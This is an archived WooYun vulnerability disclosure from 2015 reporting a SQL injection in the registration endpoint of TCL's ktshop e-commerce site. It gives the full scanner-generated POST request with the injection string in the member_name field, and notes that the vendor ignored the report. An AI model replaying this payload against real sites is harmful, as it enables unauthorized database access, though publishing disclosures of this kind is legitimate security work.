乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-07: 厂商已经主动忽略漏洞,细节向公众公开
http://ktshop.tcl.com/ tcl电子商务平台,其实这个洞放了半年多了,此前不会跑这种注入,今天偶然发现,查了一下,还是没有人提,那就提上来。。。
这里就是注入点
POST /shop_register.do?entcode=tclkt HTTP/1.1Content-Length: 1208Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_FPHOMASPVOX-Requested-With: XMLHttpRequestReferer: http://ktshop.tcl.com:80/Cookie: JSESSIONID=hLbNJxqK3gShM2mpk2qyTHMr0h0ppV82d9kpDFJSjpMvCm21ZzN9!-591415185Host: ktshop.tcl.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_QKEDSVQANR-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="address"3137 Laguna Street-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="city"San Francisco-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="commend"1-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="email"sample@email.tst-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="member_name"-1' OR 1=1* AND 000103=000103 -- -------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="mobile"987-65-4329-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="province"NY-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="qq"1-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="reason"1-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="rulestr"-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="shop_address"http://-------AcunetixBoundary_QKEDSVQANRContent-Disposition: form-data; name="Submit1"########-------AcunetixBoundary_QKEDSVQANR--
危害等级:无影响厂商忽略
忽略时间:2015-09-07 10:20
漏洞Rank:4 (WooYun评价)
暂无